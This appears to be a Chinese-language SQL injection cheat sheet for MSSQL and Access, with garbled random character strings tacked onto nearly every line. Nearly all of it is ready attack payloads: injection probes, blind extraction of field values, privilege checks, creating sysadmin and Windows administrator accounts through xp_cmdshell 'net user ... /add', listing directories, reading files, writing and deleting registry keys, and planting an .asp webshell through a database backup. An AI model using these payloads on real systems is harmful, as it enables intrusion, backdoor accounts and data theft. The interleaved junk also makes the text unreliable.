1.判断是否有注入;and 1=1 ;and 1=2 `9J9[!+!`
2.初步判断是否是mssql ;and user>0 jBw)8~tYm
J}X{8Ds9
3.注入参数是字符'and [查询条件] and ''=' ls]N&!/hq
V<0iYi;4=
4.搜索时没过滤参数的'and [查询条件] and '%25'=' CPP~,E_
?";SUku
5.判断数据库系统 cZ?QI6|[
d-UeItyW*
;and (select count(*) from sysobjects)>0 mssql Kg$RT?q-C6
D'#Q`H
;and (select count(*) from msysobjects)>0 access 1I9v`eT4
<GNLDpj
;X,u
"[|b,fxR
6.猜数据库 ;and (select Count(*) from [数据库名])>0 e}e8WR=B
fq6%@M~
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ==5F[UX
n_e'n|T
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ?W'p&(;
3N+lWuE}K
9.(1)猜字段的ascii值(access) 7R2O[=Szq
,94<j,"
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 <'I["Um
:;7I_tb
(2)猜字段的ascii值(mssql) fo@^=-4A-
[s{!
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 St-uE|8
'+cI W(F?
10.测试权限结构(mssql) y~
=H`PAE
ijF_
KP'
cqNK`3:.j
((k"*f2%
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- dq[h:kYm
FLqN3D=yQ
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- !LI<%P)
~9dpB>+
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- RwWg:4
=^nb+}Nz(
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- \c}(rqT
dw
bR,K
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 5~JT*Ny
`Z?wj@H1`
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- smQ^(S^
K T}
;and 1=(select IS_MEMBER('db_owner'));-- &r5q,l&@n
@^W`Yg)C
bV_nYpo
|@Tga_0p
11.添加mssql和系统的帐户 '-;[8:y.
Z',!LK!
;exec master.dbo.sp_addlogin username;-- afEa@et'
;exec master.dbo.sp_password null,username,password;-- fGo4&( U
IY`p7 )#i
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- %iN>4;T8
bmfM_oz
;exec master.dbo.xp_cmdshell 'net user username password V8?}I)#(7
Tu#< {'1$
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- W(s4R,j
QU|_
r2LM
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 9 E!le=>
NK_|h%
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ,fVD`RR(W?
>gk_klLh
Lx^ eaP5
,kN;d}bg
12.(1)遍历目录 e#(Ck{e
X
W)TI
;create table dirs(paths varchar(100), id int) Kx__&a
&XP(D5lf`B
;insert dirs exec master.dbo.xp_dirtree 'c:\' ff"wg\O4
tgK
I
;and (select top 1 paths from dirs)>0 '$K E=Jy
dj0; tQ=C
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) >H2`4]4]
BX,)G HE
Aw o)a8e
#%0V`BS7n
(2)遍历目录 gE-y`2SU
#WpkL]g2+%
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- z ^gJy,T
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 1 DWoL}Z
157_0
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 P3$eomX'
'y8{,R4C
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 >:;dNVz
*z=_sD?1
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 rz?Cn
X.t
*Gbhk8}V'
RpHlq
}'X=&3m
13.mssql中的存储过程 &|>+LP@8
24mdhT|
xp_regenumvalues 注册表根键, 子键 yBIlwN`kB
Y?T{>"_W
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 xvr5$x|h
2ej7Ql_@c
xp_regread 根键,子键,键值名 <qCa9@Ea
(!os&/",
;exec xp_regread lq/2Y4LE)
[m
t.2 .
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 pm&THd
--$o$EP`
xp_regwrite 根键,子键, 值名, 值类型, 值 1^p/#jt
'=\}dav!
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 h~MV=7
lE
Y Y:BwW:
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Zo9<96I&
JE?p'77C
xp_regdeletevalue 根键,子键,值名 ])x1MmRg\
j]a$RC#
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 R$a<=
=P-&dN
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 `+JFvn!
P:qmg"i@3
!*IMWm>
T5BZD
+Ta
14.mssql的backup创建webshell G7-BeA8
wucdXj{%
use model l.[pnL D
~xH&"1
create table cmd(str image); "(koR Q
"q4tvcK.
insert into cmd(str) values (''); B{-7
D7ex{SVA)
backup database model to disk='c:\l.asp'; cH]tZ$E`
dn6B43w
ntiS7g e1
T X`X5j
15.mssql内置函数 #m+!<
l{3B}_,
;and (select @@version)>0 获得Windows的版本号 t<%0eu|
uFd$*`jS
;and user_name()='dbo' 判断当前系统的连接用户是不是sa q^@*{H
yoi4w 7:
;and (select user_name())>0 爆当前系统的连接用户 >%JPgr/
8
Otn,UoeeB
;and (select db_name())>0 得到当前连接的数据库 jXcJ/g(X3
)n/%P4l
]n ?x tI
w-jElV
16.简洁的webshell 0MQ= Rt
3JoY-
use model z(PUoV:?
0oe<=L]F
create table cmd(str image); .{Y;6]9[
kH!Z|Ps?R
insert into cmd(str) values (''); ><%585
NOz3_k
backup database model to disk='g:\wwwtest\l.asp';